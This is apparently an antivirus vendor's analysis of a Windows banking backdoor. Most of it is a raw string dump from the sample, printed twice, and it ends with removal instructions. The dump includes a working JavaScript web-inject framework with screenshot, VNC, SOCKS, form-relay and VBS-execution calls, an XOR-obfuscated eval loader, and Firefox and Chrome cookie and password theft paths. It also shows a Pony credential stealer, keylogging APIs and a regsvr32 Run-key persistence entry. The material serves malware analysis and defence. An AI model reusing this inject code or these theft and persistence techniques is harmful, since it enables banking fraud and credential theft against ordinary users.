this.Query("POST",Url,Data,Callback);};this["StartVnc"]=function(Data,Callback){Url="12/";return this.Query("POST",Url,Data,Callback);};this["SendForm"]=function(Link,Data,Callback){Url="13/";Post=Link "\x0D\x0A" Data;return this.Query("POST",Url,Post,Callback);};this["StartVideo"]=function(WorkTime,Callback){Url="14/" WorkTime;Data=document["location"]["href"];return this.Query("POST",Url,Data,Callback);};this["StopVideo"]=function(Callback){Url="15/";return this.Query("GET",Url,null,Callback);};this["ExecVBS"]=function(Data,Callback){Url="16/";return this.Query("POST",Url,Data,Callback);};this["Hide"]=function(Name){El=document["getElementById"](Name);El["parentNode"]["removeChild"](El);};}9L%d_
advapi32.dll
ole32.dll
shlwapi.dll
user32.dll
userenv.dll
wsock32.dll
RegCloseKey
CertificateAuthority
%s.pfx
cookies.sqlite
cookies.sqlite-journal
ff/%u/cookies.sqlite
c:\test_x32.dll
#dbgmsg
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
login=%s&pass=%s
C:\ProgramData
%Documents and Settings%\All Users\Application Data
chrome.dll
127.0.0.1
Content-Disposition: form-data; name="%s"
--%s--
Content-Disposition: form-data; name="%s"; filename="%s"
---------------------------%u%0.4x%0.8x
Content-Type: application/x-www-form-urlencoded
id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
fv_%u.avi
#FV_%u
#FV_%s
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);user_pref("network.http.spdy.enabled.v3", false);user_pref("network.http.spdy.enabled.v3-1", false);user_pref("layers.acceleration.disabled", true);user_pref("gfx.direct2d.disabled", true);prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsas.exe
lsm.exe
winlogon.exe
Dbgview.exe
taskhost.exe
HttpEndRequestA
HttpEndRequestW
%s%s%u
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
regsvr32.exe "%s"
Software\Microsoft\Windows\CurrentVersion\Run
#cert
regsvr32.exe /s /i:"%u" "%s"
[Pony] Fail Get Pass
DL_EXEC LOAD ERROR: %u = %s
DL_EXEC Status [Pipe]: %u-%u-%u-%u
DL_EXEC Status[Local]: %u = %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
firefox.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
\\.\pipe\
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
%Program Files%\Mozilla Firefox\
mozsqlite3.dll
sqlite3_open
sqlite3_exec
sqlite3_close
sqlite3_free
dbghelp.dll
\%u.dmp
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
gdiplus.dll
GdiplusShutdown
[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
SysShadow
Chrome_WidgetWin_1
Chrome_WidgetWin_0
d3d10_1.dll
d3d10_1core.dll
d3d10.dll
d3d10core.dll
d2d1.dll
OPENGL32.dll
d3d9.dll
d3d11.dll
Dxtrans.dll
WinExec
KERNEL32.dll
USER32.dll
GDI32.dll
RegNotifyChangeKeyValue
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
NETAPI32.dll
SHLWAPI.dll
DeleteUrlCacheEntry
WININET.dll
WS2_32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
CryptImportKey
CryptDestroyKey
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
OLEAUT32.dll
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
FindCloseUrlCache
COMDLG32.dll
WININET.DLL
O.PRF*
%XkOS
7%7.777@7
1#1-161@1|1
.pdata
@.reloc
@8.tW
c:\test_x64.dll
[%s - X64 EQ PID: %u TID: %u]
\SysWOW64\regsvr32.exe
[Pony] Fail create process: %u
[PONY] Fail inject to process: %u
lc:\32.dll
32.dll
echrome.dll
regsvr32.exe
%c:\~%0.8x.tmp
iexplore.exe
chrome.exe
\System32\KERNEL32.DLL
\System32\kernelbase.dll
\ThemeApiPort
lc:\64.dll
64.dll
sppsvc.exe_3244_rwx_00800000_00055000:
.text
`.rdata
@.data
.reloc
HHt.HHt
More information: hXXp://VVV.ibsensoftware.com/
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
KERNEL32.DLL
\Google\Chrome\User Data\Default\
\Mozilla\Firefox\Profiles\
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
tor2web.org
hXXps://%s.%s/favicon.ico
.rdata
@http
SELECT url FROM moz_places
places.sqlite
ie/history.txt
ff/history.txt
ff/%u/places.sqlite
eval((function(_x%x){var _x%x='';var _x%x="";for (var _x%x=0;_x%x<_x%x.length;_x%x )
{_x%x =String.fromCharCode(_x%x.charCodeAt(_x%x)^(_x%x&0xFF));_x%x ;}return _x%x;})(0x%x));
function EQFramework(Key)
var %s = new function()
%s.Key = '%s';
%s.Hide('%0.8X%0.8X');framework_key%
{this["_Key"]=Key;this["_LastAsync"]=null;this["Version"]=2;this["GetXHR"]=function(){if( typeof XMLHttpRequest==="undefined"){XMLHttpRequest=function(){try{return new ActiveXObject("Msxml2.XMLHTTP.6.0")}catch(e){};try{return new ActiveXObject("Msxml2.XMLHTTP.3.0")}catch(e){};try{return new ActiveXObject("Msxml2.XMLHTTP")}catch(e){};try{return new ActiveXObject("Microsoft.XMLHTTP")}catch(e){};return false;}};return new XMLHttpRequest();};this["Query"]=function(Method,Url,Post,Callback){var xhr=this.GetXHR();var LastAsync=null;var thisfw=this;Async=( typeof (Callback)=="undefined")?false:true;Url="/" this["_Key"] "/" Math["random"]() "/" Url;if(Async==true){this["_LastAsync"]=null;xhr["onreadystatechange"]=function(){try{if(xhr["readyState"]==4){if(xhr["status"]!=200||xhr["responseText"]=="-"){thisfw["_LastAsync"]=false;if( typeof (Callback)=="function"){Callback(false)};}else {if(xhr["responseText"]==" "){thisfw["_LastAsync"]=true;if( typeof (Callback)=="function"){Callback(true)};}else {thisfw["_LastAsync"]=xhr["responseText"];if( typeof (Callback)=="function"){Callback(xhr["responseText"])};}}}}catch(e){thisfw["_LastAsync"]=false;if( typeof (Callback)=="function"){Callback(false)};}};};xhr["open"](Method,Url,Async);xhr["send"](Post);if(Async==true){return true};try{if(xhr["readyState"]==4&&xhr["status"]==200){if(xhr["responseText"]=="-"){return false}else {if(xhr["responseText"]==" "){return true}else {return xhr["responseText"]}}};return false;}catch(e){return false};};this["GetLastAsync"]=function(){return this["_LastAsync"]};this["SetVal"]=function(Name,Value,Callback){Url="1/" Name;return this.Query("POST",Url,Value,Callback);};this["GetVal"]=function(Name,Callback){Url="2/" Name;return this.Query("GET",Url,null,Callback);};this["DelVal"]=function(Name,Callback){Url="3/" Name;return this.Query("GET",Url,null,Callback);};this["ClearVals"]=function(Callback){Url="4/";return this.Query("GET",Url,null,Callback);};this["GetServer"]=function(Url,Ssl,Callback){t=(Ssl==true)?"S":"D";return this.Query("GET","5/" t "/" Url,null,Callback);};this["PostServer"]=function(Url,Ssl,Post,Callback){t=(Ssl==true)?"S":"D";return this.Query("POST","5/" t "/" Url,Post,Callback);};this["Get"]=function(Url,Ssl,Cookie,Callback){t=(Ssl==true)?"S":"D";if( typeof (Cookie)=="undefined"||Cookie==false){Cookie=null;Type="GET";}else {Cookie="Cookie: " Cookie;Type="POST";};return this.Query(Type,"6/" t "/" Url,Cookie,Callback);};this["Post"]=function(Url,Ssl,Post,Callback){t=(Ssl==true)?"S":"D";return this.Query("POST","7/" t "/" Url,Post,Callback);};this["ScreenShot"]=function(Info,Timeout,Size,Callback){Url="8/" Timeout "/" Size "/" encodeURIComponent(Info);return this.Query("GET",Url,null,Callback);};this["LogAdd"]=function(Text,Callback){Url="9/";return this.Query("POST",Url,Text,Callback);};this["UpdateConfig"]=function(Callback){Url="10/";return this.Query("GET",Url,null,Callback);};this["StartSocks"]=function(Data,Callback){Url="11/";return this.Query("POST",Url,Data,Callback);};this["StartVnc"]=function(Data,Callback){Url="12/";return this.Query("POST",Url,Data,Callback);};this["SendForm"]=function(Link,Data,Callback){Url="13/";Post=Link "\x0D\x0A" Data;return this.Query("POST",Url,Post,Callback);};this["StartVideo"]=function(WorkTime,Callback){Url="14/" WorkTime;Data=document["location"]["href"];return this.Query("POST",Url,Data,Callback);};this["StopVideo"]=function(Callback){Url="15/";return this.Query("GET",Url,null,Callback);};this["ExecVBS"]=function(Data,Callback){Url="16/";return this.Query("POST",Url,Data,Callback);};this["Hide"]=function(Name){El=document["getElementById"](Name);El["parentNode"]["removeChild"](El);};}9L%d_
advapi32.dll
ole32.dll
shlwapi.dll
user32.dll
userenv.dll
wsock32.dll
RegCloseKey
CertificateAuthority
%s.pfx
cookies.sqlite
cookies.sqlite-journal
ff/%u/cookies.sqlite
c:\test_x32.dll
#dbgmsg
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
login=%s&pass=%s
C:\ProgramData
%Documents and Settings%\All Users\Application Data
chrome.dll
127.0.0.1
Content-Disposition: form-data; name="%s"
--%s--
Content-Disposition: form-data; name="%s"; filename="%s"
---------------------------%u%0.4x%0.8x
Content-Type: application/x-www-form-urlencoded
id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
fv_%u.avi
#FV_%u
#FV_%s
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);user_pref("network.http.spdy.enabled.v3", false);user_pref("network.http.spdy.enabled.v3-1", false);user_pref("layers.acceleration.disabled", true);user_pref("gfx.direct2d.disabled", true);prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsas.exe
lsm.exe
winlogon.exe
Dbgview.exe
taskhost.exe
HttpEndRequestA
HttpEndRequestW
%s%s%u
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
regsvr32.exe "%s"
Software\Microsoft\Windows\CurrentVersion\Run
#cert
regsvr32.exe /s /i:"%u" "%s"
[Pony] Fail Get Pass
DL_EXEC LOAD ERROR: %u = %s
DL_EXEC Status [Pipe]: %u-%u-%u-%u
DL_EXEC Status[Local]: %u = %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
firefox.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
\\.\pipe\
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
%Program Files%\Mozilla Firefox\
mozsqlite3.dll
sqlite3_open
sqlite3_exec
sqlite3_close
sqlite3_free
dbghelp.dll
\%u.dmp
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
gdiplus.dll
GdiplusShutdown
[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
SysShadow
Chrome_WidgetWin_1
Chrome_WidgetWin_0
d3d10_1.dll
d3d10_1core.dll
d3d10.dll
d3d10core.dll
d2d1.dll
OPENGL32.dll
d3d9.dll
d3d11.dll
Dxtrans.dll
WinExec
KERNEL32.dll
USER32.dll
GDI32.dll
RegNotifyChangeKeyValue
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
NETAPI32.dll
SHLWAPI.dll
DeleteUrlCacheEntry
WININET.dll
WS2_32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
CryptImportKey
CryptDestroyKey
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
OLEAUT32.dll
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
FindCloseUrlCache
COMDLG32.dll
WININET.DLL
O.PRF*
%XkOS
7%7.777@7
1#1-161@1|1
.pdata
@.reloc
@8.tW
c:\test_x64.dll
[%s - X64 EQ PID: %u TID: %u]
\SysWOW64\regsvr32.exe
[Pony] Fail create process: %u
[PONY] Fail inject to process: %u
lc:\32.dll
32.dll
echrome.dll
regsvr32.exe
%c:\~%0.8x.tmp
iexplore.exe
chrome.exe
\System32\KERNEL32.DLL
\System32\kernelbase.dll
\ThemeApiPort
lc:\64.dll
64.dll
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
regsvr32.exe:1796
- Delete the original Backdoor file.
- Delete or disinfect the following files created/modified by the Backdoor:
C:\ProgramData\LibxaJximb\QamzEsom.ijv (1425 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"LibxaJximb" = "regsvr32.exe C:\ProgramData\LibxaJximb\QamzEsom.ijv" - Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
